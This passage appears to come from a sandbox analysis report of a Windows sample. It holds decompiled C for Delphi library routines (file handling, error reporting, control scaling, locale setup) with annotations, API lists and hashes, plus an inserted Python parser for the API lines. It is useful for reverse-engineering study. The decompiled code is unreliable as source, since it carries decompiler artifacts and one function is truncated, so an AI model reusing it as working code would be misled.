                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CaptureMessageSend$ActiveWindow$Release
                                                    • String ID: H/B
                                                    • API String ID: 862346643-184950203
                                                    • Opcode ID: c132ccbc1d8843ba1326dfc613755e208ed03b4cb6e87a844a7b76971916ced5
                                                    • Instruction ID: 07b1c62a38d4c59f35ab2a161c95611ba83c65b292c9824363ed57e20a3288b5
                                                    • Opcode Fuzzy Hash: c132ccbc1d8843ba1326dfc613755e208ed03b4cb6e87a844a7b76971916ced5
                                                    • Instruction Fuzzy Hash: 19512E34A04244EFDB10EF6AD946F9A77F1EB49704F1580BAF800A73A2D778AD44DB49
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 70%
                                                    			E00402D70(void** __eax) {
                                                    				long _t29;
                                                    				void* _t31;
                                                    				long _t34;
                                                    				void* _t38;
                                                    				void* _t40;
                                                    				long _t41;
                                                    				int _t44;
                                                    				void* _t46;
                                                    				long _t54;
                                                    				long _t55;
                                                    				void* _t58;
                                                    				void** _t59;
                                                    				DWORD* _t60;
                                                    
                                                    				_t59 = __eax;
                                                    				 *((intOrPtr*)(__eax + 0xc)) = 0;
                                                    				 *((intOrPtr*)(__eax + 0x10)) = 0;
                                                    				if(0xffffffffffff284f == 0) {
                                                    					_t29 = 0x80000000;
                                                    					_t55 = 1;
                                                    					_t54 = 3;
                                                    					 *((intOrPtr*)(__eax + 0x1c)) = 0x402cc4;
                                                    				} else {
                                                    					if(0xffffffffffff284f == 0) {
                                                    						_t29 = 0x40000000;
                                                    						_t55 = 1;
                                                    						_t54 = 2;
                                                    					} else {
                                                    						if(0xffffffffffff284f != 0) {
                                                    							return 0xffffffffffff284d;
                                                    						}
                                                    						_t29 = 0xc0000000;
                                                    						_t55 = 1;
                                                    						_t54 = 3;
                                                    					}
                                                    					_t59[7] = E00402D04;
                                                    				}
                                                    				_t59[9] = E00402D50;
                                                    				_t59[8] = E00402D00;
                                                    				if(_t59[0x12] == 0) {
                                                    					_t59[2] = 0x80;
                                                    					_t59[9] = E00402D00;
                                                    					_t59[5] =  &(_t59[0x53]);
                                                    					if(_t59[1] == 0xd7b2) {
                                                    						if(_t59 != 0x49e3e8) {
                                                    							_push(0xfffffff5);
                                                    						} else {
                                                    							_push(0xfffffff4);
                                                    						}
                                                    					} else {
                                                    						_push(0xfffffff6);
                                                    					}
                                                    					_t31 = GetStdHandle();
                                                    					if(_t31 == 0xffffffff) {
                                                    						goto L37;
                                                    					}
                                                    					 *_t59 = _t31;
                                                    					goto L30;
                                                    				} else {
                                                    					_t38 = CreateFileA( &(_t59[0x12]), _t29, _t55, 0, _t54, 0x80, 0);
                                                    					if(_t38 == 0xffffffff) {
                                                    						L37:
                                                    						_t59[1] = 0xd7b0;
                                                    						return GetLastError();
                                                    					}
                                                    					 *_t59 = _t38;
                                                    					if(_t59[1] != 0xd7b3) {
                                                    						L30:
                                                    						if(_t59[1] == 0xd7b1) {
                                                    							L34:
                                                    							return 0;
                                                    						}
                                                    						_t34 = GetFileType( *_t59);
                                                    						if(_t34 == 0) {
                                                    							CloseHandle( *_t59);
                                                    							_t59[1] = 0xd7b0;
                                                    							return 0x69;
                                                    						}
                                                    						if(_t34 == 2) {
                                                    							_t59[8] = E00402D04;
                                                    						}
                                                    						goto L34;
                                                    					}
                                                    					_t59[1] = _t59[1] - 1;
                                                    					_t40 = GetFileSize( *_t59, 0) + 1;
                                                    					if(_t40 == 0) {
                                                    						goto L37;
                                                    					}
                                                    					_t41 = _t40 - 0x81;
                                                    					if(_t41 < 0) {
                                                    						_t41 = 0;
                                                    					}
                                                    					if(SetFilePointer( *_t59, _t41, 0, 0) + 1 == 0) {
                                                    						goto L37;
                                                    					} else {
                                                    						_t44 = ReadFile( *_t59,  &(_t59[0x53]), 0x80, _t60, 0);
                                                    						_t58 = 0;
                                                    						if(_t44 != 1) {
                                                    							goto L37;
                                                    						}
                                                    						_t46 = 0;
                                                    						while(_t46 < _t58) {
                                                    							if( *((char*)(_t59 + _t46 + 0x14c)) == 0xe) {
                                                    								if(SetFilePointer( *_t59, _t46 - _t58, 0, 2) + 1 == 0 || SetEndOfFile( *_t59) != 1) {
                                                    									goto L37;
                                                    								} else {
                                                    									goto L30;
                                                    								}
                                                    							}
                                                    							_t46 = _t46 + 1;
                                                    						}
                                                    						goto L30;
                                                    					}
                                                    				}
                                                    			}

                                                    0x00402e60
                                                    0x00000000
                                                    0x00000000
                                                    0x00402e66
                                                    0x00402e68
                                                    0x00402e74
                                                    0x00402e88
                                                    0x00000000
                                                    0x00402e98
                                                    0x00000000
                                                    0x00402e98
                                                    0x00402e88
                                                    0x00402e76
                                                    0x00402e76
                                                    0x00000000
                                                    0x00402e68
                                                    0x00402e3e

                                                    APIs
                                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402DF8
                                                    • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402E1C
                                                    • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402E38
                                                    • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000), ref: 00402E59
                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00402E82
                                                    • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00402E90
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00402ECB
                                                    • GetFileType.KERNEL32(?,000000F5), ref: 00402EE1
                                                    • CloseHandle.KERNEL32(?,?,000000F5), ref: 00402EFC
                                                    • GetLastError.KERNEL32(000000F5), ref: 00402F14
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                    • String ID:
                                                    • API String ID: 1694776339-0
                                                    • Opcode ID: 8861dfc536feb275602d3633a0ce4d7dcd0f803c1f99ce0a386a22b5fd57de5a
                                                    • Instruction ID: 9aa9312da4e91c771af0b4e33a38407941ada986436eec9a0907e2913daab745
                                                    • Opcode Fuzzy Hash: 8861dfc536feb275602d3633a0ce4d7dcd0f803c1f99ce0a386a22b5fd57de5a
                                                    • Instruction Fuzzy Hash: 31418C30140701AAE730AF24CA4DB6775A5AF00754F208E3FE5A6BA6E0D7FD9841979D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                     			// Runtime-error reporter. E0040CED0 formats the message into _v1024 (its
                                                     			// subcalls VirtualQuery / GetModuleFileNameA / LoadStringA resolve the
                                                     			// faulting module name). The flag reached through *0x49dc84 selects the
                                                     			// output path: a message box for GUI builds, stderr for console builds.
                                                     			// Shape and constants match Delphi's SysUtils.ShowException; this is RTL
                                                     			// code, not sample-specific logic.
                                                     			E0040D058(void* __edx, void* __edi, void* __fp0) {
                                                     				void _v1024;    // message buffer, 0x400 bytes
                                                     				char _v1088;    // caption buffer, 0x40 bytes
                                                     				long _v1092;    // bytes written (WriteFile)
                                                     				void* _t12;
                                                     				char* _t14;
                                                     				intOrPtr _t16;
                                                     				intOrPtr _t18;
                                                     				intOrPtr _t24;
                                                     				long _t32;
                                                     
                                                     				E0040CED0(_t12,  &_v1024, __edx, __fp0, 0x400);
                                                     				_t14 =  *0x49dc84; // 0x49e04c  (pointer to the console/GUI flag byte)
                                                     				if( *_t14 == 0) {
                                                     					_t16 =  *0x49d864; // 0x407db4
                                                     					_t9 = _t16 + 4; // 0xffd2  (string-resource id of the caption)
                                                     					_t18 =  *0x49e668; // 0x400000  (image base of this module)
                                                     					LoadStringA(E00405FDC(_t18),  *_t9,  &_v1088, 0x40);
                                                     					// 0x2010 = MB_ICONSTOP | MB_TASKMODAL
                                                     					return MessageBoxA(0,  &_v1024,  &_v1088, 0x2010);
                                                     				}
                                                     				_t24 =  *0x49d8f8; // 0x49e21c
                                                     				E004028C4(E00402FCC(_t24));
                                                     				CharToOemA( &_v1024,  &_v1024);        // in-place ANSI -> OEM conversion for the console
                                                     				_t32 = E00409F88( &_v1024, __edi);      // string length (by how it is used below)
                                                     				// 0xfffffff4 = -12 = STD_ERROR_HANDLE; the API list below prints the same
                                                     				// value as 000000F4, i.e. the 8-bit immediate before sign extension
                                                     				WriteFile(GetStdHandle(0xfffffff4),  &_v1024, _t32,  &_v1092, 0);
                                                     				// two-byte constant at 0x40d11c: the line terminator (presumably CRLF)
                                                     				return WriteFile(GetStdHandle(0xfffffff4), 0x40d11c, 2,  &_v1092, 0);
                                                     			}
                                                     
                                                     Instruction addresses, one per C-code line of the function body above, in listing order (0x00000000 marks a line with no code of its own):
                                                     0x0040d067, 0x0040d06c, 0x0040d074, 0x0040d0db, 0x0040d0e0, 0x0040d0e4, 0x0040d0ef, 0x00000000, 0x0040d105, 0x0040d076,
                                                     0x0040d080, 0x0040d08f, 0x0040d09f, 0x0040d0b2, 0x00000000

                                                    APIs
                                                      • Part of subcall function 0040CED0: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040CEED
                                                      • Part of subcall function 0040CED0: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040CF11
                                                      • Part of subcall function 0040CED0: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040CF2C
                                                      • Part of subcall function 0040CED0: LoadStringA.USER32 ref: 0040CFC2
                                                    • CharToOemA.USER32 ref: 0040D08F
                                                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0040D0AC
                                                    • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040D0B2
                                                    • GetStdHandle.KERNEL32(000000F4,0040D11C,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040D0C7
                                                    • WriteFile.KERNEL32(00000000,000000F4,0040D11C,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040D0CD
                                                    • LoadStringA.USER32 ref: 0040D0EF
                                                    • MessageBoxA.USER32 ref: 0040D105
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                    • String ID: LI
                                                    • API String ID: 185507032-1163166679
                                                    • Opcode ID: 5032c406810ebafbb8b0f00c750bd69e21efc636ecabd08e4cda58801eaa7325
                                                    • Instruction ID: 7d08aee67cafa4939384a0f732e453422e0e0597bbcbc481209cf698103cc48d
                                                    • Opcode Fuzzy Hash: 5032c406810ebafbb8b0f00c750bd69e21efc636ecabd08e4cda58801eaa7325
                                                    • Instruction Fuzzy Hash: AC119EB2948205BAD200F7A5CC86F8F77ECAB54304F40463BB754E60E2DA78E844876B
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%
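The "APIs" bullets in these listings are easier to read once two things are decoded: the numeric constants (GetStdHandle(000000F4) is STD_ERROR_HANDLE, CreateFileA's 80000000 / 00000003 are GENERIC_READ / OPEN_EXISTING) and the fact that the argument list is a dump of the stack at call time, so anything past the function's real parameter count is stale data from earlier calls (GetFileSize's line above carries CreateFileA's seven arguments behind its own two). The following parser is an added example of mine, not Joe Sandbox's code and not part of the sample; the sample lines are copied from this page, while the parameter-count table, the constant tables and the reading of 000000F4 as a zero-extended 8-bit immediate are my assumptions.

```python
"""Reader for the "APIs" bullet lines of a Joe Sandbox function listing.

Added example, not part of the report. SAMPLE is copied from this page; ARGC,
ENUMS and FLAGS are my own tables from the public Win32 prototypes.
"""
import re
from dataclasses import dataclass

# Shapes seen in the listing (bullet "•", optionally after "Part of subcall function XXXXXXXX:"):
#   • CreateFileA.KERNEL32(00000000,80000000,...), ref: 00402DF8
#   • LoadStringA.USER32 ref: 0040D0EF
LINE_RE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<func>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Real parameter counts (assumed from the Win32 prototypes). Tokens beyond this
# count are leftover stack dwords from earlier calls, not arguments.
ARGC = {
    "CreateFileA": 7, "GetFileSize": 2, "SetFilePointer": 4, "ReadFile": 5,
    "SetEndOfFile": 1, "GetStdHandle": 1, "GetFileType": 1, "CloseHandle": 1,
    "GetLastError": 0, "WriteFile": 5, "MessageBoxA": 4, "LoadStringA": 4,
    "CharToOemA": 2, "VirtualQuery": 3, "GetModuleFileNameA": 3, "MulDiv": 3,
}
# Exact-value names and bit flags for selected (function, parameter index) pairs.
ENUMS = {
    ("GetStdHandle", 0): {0xFFFFFFF6: "STD_INPUT_HANDLE", 0xFFFFFFF5: "STD_OUTPUT_HANDLE",
                          0xFFFFFFF4: "STD_ERROR_HANDLE"},
    ("CreateFileA", 4): {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                         4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"},
    ("SetFilePointer", 3): {0: "FILE_BEGIN", 1: "FILE_CURRENT", 2: "FILE_END"},
}
FLAGS = {
    ("CreateFileA", 1): {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE"},
    ("CreateFileA", 2): {1: "FILE_SHARE_READ", 2: "FILE_SHARE_WRITE", 4: "FILE_SHARE_DELETE"},
    ("CreateFileA", 5): {0x80: "FILE_ATTRIBUTE_NORMAL"},
    ("MessageBoxA", 3): {0x10: "MB_ICONSTOP", 0x2000: "MB_TASKMODAL"},
}


@dataclass
class ApiCall:
    func: str
    module: str
    ref: int
    args: list      # decoded real arguments; "?" means the report had no value
    leftover: list  # raw tokens beyond ARGC, i.e. stale stack dwords


def decode_arg(func: str, idx: int, tok: str) -> str:
    """Turn one hex token into a constant name, a flag combination or 0x%08x."""
    if tok == "?":
        return "?"
    val = (-int(tok[1:], 16) if tok.startswith("-") else int(tok, 16)) & 0xFFFFFFFF
    enum = ENUMS.get((func, idx))
    if enum is not None:
        # Assumption: an 8-bit immediate is printed zero-extended in this column
        # (GetStdHandle(000000F4)) but sign-extended in the C column (0xfffffff4).
        candidates = [val] + ([val | 0xFFFFFF00] if val < 0x100 else [])
        for cand in candidates:
            if cand in enum:
                return enum[cand]
        return f"0x{val:08x}"
    flags = FLAGS.get((func, idx))
    if flags is not None:
        names = [name for bit, name in flags.items() if val & bit]
        known = 0
        for bit in flags:
            known |= bit
        rest = val & ~known & 0xFFFFFFFF          # bits we have no name for
        if rest:
            names.append(f"0x{rest:08x}")
        return "|".join(names) if names else "0"
    return f"0x{val:08x}"


def parse_line(line: str) -> ApiCall:
    """Parse one report bullet; anything else raises ValueError."""
    m = LINE_RE.match(line)
    if m is None:
        raise ValueError(f"not an API line: {line!r}")
    toks = [t.strip() for t in m["args"].split(",")] if m["args"] else []
    argc = ARGC.get(m["func"], len(toks))   # unknown function: trust every token
    real, leftover = toks[:argc], toks[argc:]
    return ApiCall(m["func"], m["module"], int(m["ref"], 16),
                   [decode_arg(m["func"], i, t) for i, t in enumerate(real)], leftover)


def render(call: ApiCall) -> str:
    """One readable line per call, flagging how much stale stack was printed."""
    text = f"{call.ref:08X}: {call.func}({', '.join(call.args)})"
    if call.leftover:
        text += f"  [+{len(call.leftover)} leftover stack dwords]"
    return text


def parse_listing(text: str) -> list:
    return [parse_line(l) for l in text.splitlines() if l.strip()]


# Constructed input: bullets copied verbatim from the listings on this page.
SAMPLE = """\
• CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402DF8
• GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402E1C
• SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00402E82
• GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0040D0AC
  • Part of subcall function 0040CED0: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040CEED
• LoadStringA.USER32 ref: 0040D0EF
"""

if __name__ == "__main__":
    for call in parse_listing(SAMPLE):
        print(render(call))
```

The leftover count is the part worth keeping in mind when reading these lists: a value that looks like an interesting argument under one call is often just what the previous call left on the stack, which is why ARGC is consulted before any decoding. Unknown functions fall back to taking every token at face value, so extend ARGC for whatever APIs the listing you are reading contains.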

                                                    C-Code - Quality: 100%
                                                     			// Proportional rescale of a control's position, size and font by M/D
                                                     			// (__edx = M, __ecx = D, __eax = the object). A flag byte selects which
                                                     			// fields are scaled; each selected field goes through MulDiv(value, M, D).
                                                     			// The field offsets 0x40/0x44/0x48/0x4c, the state bit at +0x1c, the
                                                     			// style bits at +0x51, the virtual call at vtable+0x84 and the clearing of
                                                     			// the flag byte at +0x98 match Delphi VCL's TControl.ChangeScale with
                                                     			// its sfLeft/sfTop/sfWidth/sfHeight/sfFont flags. Library code, not
                                                     			// sample-specific logic.
                                                     			E0043AB98(intOrPtr* __eax, int __ecx, int __edx) {
                                                     				char _t62;
                                                     				signed int _t64;
                                                     				signed int _t65;
                                                     				signed char _t107;
                                                     				intOrPtr _t113;
                                                     				intOrPtr _t114;
                                                     				int _t117;
                                                     				intOrPtr* _t118;
                                                     				int _t119;
                                                     				int* _t121;
                                                     
                                                     				 *_t121 = __ecx;                 // D
                                                     				_t117 = __edx;                   // M
                                                     				_t118 = __eax;                   // this
                                                     				if(__edx ==  *_t121) {           // M == D: nothing to scale
                                                     					L29:
                                                     					_t62 =  *0x43ad44; // 0x0
                                                     					 *((char*)(_t118 + 0x98)) = _t62;  // clear the scaling flags
                                                     					return _t62;
                                                     				}
                                                     				if(( *(__eax + 0x1c) & 0x00000001) == 0) {   // state bit 0 (loading) clear:
                                                     					_t107 =  *0x43ad3c; // 0x1f             // scale everything (all five flags)
                                                     				} else {
                                                     					_t107 =  *((intOrPtr*)(__eax + 0x98));     // otherwise use the object's own flags
                                                     				}
                                                     				if((_t107 & 0x00000001) == 0) {  // bit 0: Left (+0x40)
                                                     					_t119 =  *(_t118 + 0x40);
                                                     				} else {
                                                     					_t119 = MulDiv( *(_t118 + 0x40), _t117,  *_t121);
                                                     				}
                                                     				if((_t107 & 0x00000002) == 0) {  // bit 1: Top (+0x44)
                                                     					_t121[1] =  *(_t118 + 0x44);
                                                     				} else {
                                                     					_t121[1] = MulDiv( *(_t118 + 0x44), _t117,  *_t121);
                                                     				}
                                                     				// bit 2: Width (+0x48), skipped when the fixed-width style bit at +0x51 is set
                                                     				if((_t107 & 0x00000004) == 0 || ( *(_t118 + 0x51) & 0x00000001) != 0) {
                                                     					_t64 =  *(_t118 + 0x48);
                                                     					_t121[2] = _t64;
                                                     				} else {
                                                     					if((_t107 & 0x00000001) == 0) {
                                                     						_t64 = MulDiv( *(_t118 + 0x48), _t117,  *_t121);
                                                     						_t121[2] = _t64;
                                                     					} else {
                                                     						// Left was scaled too: scale the right edge and subtract the new Left,
                                                     						// so the two roundings do not drift apart
                                                     						_t64 = MulDiv( *(_t118 + 0x40) +  *(_t118 + 0x48), _t117,  *_t121) - _t119;
                                                     						_t121[2] = _t64;
                                                     					}
                                                     				}
                                                     				// bit 3: Height (+0x4c), same pattern with the fixed-height style bit at +0x51
                                                     				_t65 = _t64 & 0xffffff00 | (_t107 & 0x00000008) != 0x00000000;
                                                     				if(_t65 == 0 || ( *(_t118 + 0x51) & 0x00000002) != 0) {
                                                     					_t121[3] =  *(_t118 + 0x4c);
                                                     				} else {
                                                     					if(_t65 == 0) {
                                                     						_t121[3] = MulDiv( *(_t118 + 0x44), _t117,  *_t121);
                                                     					} else {
                                                     						_t121[3] = MulDiv( *(_t118 + 0x44) +  *(_t118 + 0x4c), _t117,  *_t121) - _t121[1];
                                                     					}
                                                     				}
                                                     				 *((intOrPtr*)( *_t118 + 0x84))(_t121[4], _t121[2]);   // virtual call (SetBounds) with the new rectangle
                                                     				_t113 =  *0x43ad44; // 0x0
                                                     				if(_t113 != (_t107 &  *0x43ad40)) {              // flag mask at 0x43ad40 set: rescale +0x90
                                                     					 *(_t118 + 0x90) = MulDiv( *(_t118 + 0x90), _t117,  *_t121);
                                                     				}
                                                     				_t114 =  *0x43ad44; // 0x0
                                                     				if(_t114 != (_t107 &  *0x43ad48)) {              // flag mask at 0x43ad48 set: rescale +0x94
                                                     					 *(_t118 + 0x94) = MulDiv( *(_t118 + 0x94), _t117,  *_t121);
                                                     				}
                                                     				// bit 4: font, unless the byte at +0x59 (parent font) is set. E00425094 reads
                                                     				// the font size, E004250B0 writes it; the setter's own MulDiv(..., 72)
                                                     				// (see the subcall entry below) is the point-to-pixel conversion.
                                                     				if( *((char*)(_t118 + 0x59)) == 0 && (_t107 & 0x00000010) != 0) {
                                                     					E004250B0( *((intOrPtr*)(_t118 + 0x68)), MulDiv(E00425094( *((intOrPtr*)(_t118 + 0x68))), _t117,  *_t121));
                                                     				}
                                                     				goto L29;
                                                     			}
                                                     
                                                     Instruction addresses, one per C-code line of the function body above, in listing order (0x00000000 marks a line with no code of its own):
                                                     0x0043ab9f, 0x0043aba2, 0x0043aba4, 0x0043aba9, 0x0043ad26, 0x0043ad26, 0x0043ad2b, 0x0043ad38, 0x0043ad38, 0x0043abb3,
                                                     0x0043abbd, 0x0043abb5, 0x0043abb5, 0x0043abb5, 0x0043abc6, 0x0043abda, 0x0043abc8, 0x0043abd6, 0x0043abd6, 0x0043abe0,
                                                     0x0043abf9, 0x0043abe2, 0x0043abf0, 0x0043abf0, 0x0043ac00, 0x0043ac3a, 0x0043ac3d, 0x0043ac08, 0x0043ac0b, 0x0043ac2f,
                                                     0x0043ac34, 0x0043ac0d, 0x0043ac1e, 0x0043ac20, 0x0043ac20, 0x0043ac0b, 0x0043ac44, 0x0043ac49, 0x0043ac8d, 0x0043ac51,
                                                     0x0043ac59, 0x0043ac84, 0x0043ac5b, 0x0043ac70, 0x0043ac70, 0x0043ac59, 0x0043aca5, 0x0043acb3, 0x0043acbb, 0x0043acce,
                                                     0x0043acce, 0x0043acdc, 0x0043ace4, 0x0043acf7, 0x0043acf7, 0x0043ad01, 0x0043ad21, 0x0043ad21, 0x00000000

                                                    APIs
                                                    • MulDiv.KERNEL32(?,?,?), ref: 0043ABD1
                                                    • MulDiv.KERNEL32(?,?,?), ref: 0043ABEB
                                                    • MulDiv.KERNEL32(?,?,?), ref: 0043AC19
                                                    • MulDiv.KERNEL32(?,?,?), ref: 0043AC2F
                                                    • MulDiv.KERNEL32(?,?,?), ref: 0043AC67
                                                    • MulDiv.KERNEL32(?,?,?), ref: 0043AC7F
                                                    • MulDiv.KERNEL32(?,?,0000001F), ref: 0043ACC9
                                                    • MulDiv.KERNEL32(?,?,0000001F), ref: 0043ACF2
                                                    • MulDiv.KERNEL32(00000000,?,0000001F), ref: 0043AD18
                                                      • Part of subcall function 004250B0: MulDiv.KERNEL32(00000000,?,00000048), ref: 004250BD
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 74bc730eb7918a069ca069f08e5092c7babda7016c5e1a77fecd0a99066e1a0c
                                                    • Instruction ID: d10f16ddfd9cc23340e03066ebc6cedff9c8bd4490aae9a17c26e6f9981b1e60
                                                    • Opcode Fuzzy Hash: 74bc730eb7918a069ca069f08e5092c7babda7016c5e1a77fecd0a99066e1a0c
                                                    • Instruction Fuzzy Hash: C6518E70648744AFC320DB29C841B6BB7E9AF59304F04A81EB9D5C7792C63DEC508B1A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 72%
                                                     			// Locale format-settings initialisation. For GetThreadLocale() it fetches
                                                     			// the number, currency, date and time settings (E0040C964: string LCTYPE
                                                     			// with a default; E0040C9B0: single-character LCTYPE with a default;
                                                     			// E00409664: string to integer) and stores them in the globals from
                                                     			// 0x49e684 onward. The LCTYPE ids and the "m/d/yy", "mmmm d, yyyy",
                                                     			// ":mm" and ":mm:ss" defaults match Delphi's SysUtils.GetFormatSettings;
                                                     			// library code, not sample-specific logic. Quality 72%: _t43, _t132,
                                                     			// _t190, _t191 and _t196.._t198 are temporaries the decompiler uses
                                                     			// without declaring. The listing is cut off before the function ends.
                                                     			E0040E2E8(void* __ebx, void* __edx, void* __edi, void* __esi) {
                                                     				char _v8;
                                                     				char _v12;
                                                     				char _v16;
                                                     				char _v20;
                                                     				char _v24;
                                                     				char _v28;
                                                     				char _v32;
                                                     				char _v36;
                                                     				char _v40;
                                                     				char _v44;
                                                     				char _v48;
                                                     				char _v52;
                                                     				char _v56;
                                                     				char _v60;
                                                     				char _v64;
                                                     				char _v68;
                                                     				void* _t104;
                                                     				void* _t111;
                                                     				void* _t133;
                                                     				intOrPtr _t183;
                                                     				intOrPtr _t193;
                                                     				intOrPtr _t194;
                                                     
                                                     				_t191 = __esi;
                                                     				_t190 = __edi;
                                                     				_t193 = _t194;
                                                     				_t133 = 8;
                                                     				do {                               // zero 16 stack slots for the local strings
                                                     					_push(0);
                                                     					_push(0);
                                                     					_t133 = _t133 - 1;
                                                     				} while (_t133 != 0);
                                                     				_push(__ebx);
                                                     				_push(_t193);
                                                     				_push(0x40e5b3);                   // try/finally: install an SEH frame, handler at 0x40e5b3
                                                     				_push( *[fs:eax]);
                                                     				 *[fs:eax] = _t194;
                                                     				E0040E174();
                                                     				E0040CA14(__ebx, __edi, __esi);
                                                     				_t196 =  *0x49e750;
                                                     				if( *0x49e750 != 0) {
                                                     					E0040CBEC(__esi, _t196);
                                                     				}
                                                     				_t132 = GetThreadLocale();
                                                     				E0040C964(_t43, 0, 0x14,  &_v20);                     // 0x14 = LOCALE_SCURRENCY
                                                     				E00404A14(0x49e684, _v20);                            // currency string
                                                     				E0040C964(_t43, 0x40e5c8, 0x1b,  &_v24);              // 0x1b = LOCALE_ICURRENCY (default string at 0x40e5c8)
                                                     				 *0x49e688 = E00409664(0x40e5c8, 0, _t196);           // currency format
                                                     				E0040C964(_t132, 0x40e5c8, 0x1c,  &_v28);             // 0x1c = LOCALE_INEGCURR
                                                     				 *0x49e689 = E00409664(0x40e5c8, 0, _t196);           // negative currency format
                                                     				 *0x49e68a = E0040C9B0(_t132, 0x2c, 0xf);             // 0xf = LOCALE_STHOUSAND, default ','
                                                     				 *0x49e68b = E0040C9B0(_t132, 0x2e, 0xe);             // 0xe = LOCALE_SDECIMAL, default '.'
                                                     				E0040C964(_t132, 0x40e5c8, 0x19,  &_v32);             // 0x19 = LOCALE_ICURRDIGITS
                                                     				 *0x49e68c = E00409664(0x40e5c8, 0, _t196);           // currency decimals
                                                     				 *0x49e68d = E0040C9B0(_t132, 0x2f, 0x1d);            // 0x1d = LOCALE_SDATE, default '/'
                                                     				E0040C964(_t132, "m/d/yy", 0x1f,  &_v40);             // 0x1f = LOCALE_SSHORTDATE
                                                     				E0040CC9C(_v40, _t132,  &_v36, _t190, _t191, _t196);  // normalise the date picture
                                                     				E00404A14(0x49e690, _v36);                            // short date format
                                                     				E0040C964(_t132, "mmmm d, yyyy", 0x20,  &_v48);       // 0x20 = LOCALE_SLONGDATE
                                                     				E0040CC9C(_v48, _t132,  &_v44, _t190, _t191, _t196);
                                                     				E00404A14(0x49e694, _v44);                            // long date format
                                                     				 *0x49e698 = E0040C9B0(_t132, 0x3a, 0x1e);            // 0x1e = LOCALE_STIME, default ':'
                                                     				E0040C964(_t132, 0x40e5fc, 0x28,  &_v52);             // 0x28 = LOCALE_S1159 (AM marker)
                                                     				E00404A14(0x49e69c, _v52);
                                                     				E0040C964(_t132, 0x40e608, 0x29,  &_v56);             // 0x29 = LOCALE_S2359 (PM marker)
                                                     				E00404A14(0x49e6a0, _v56);
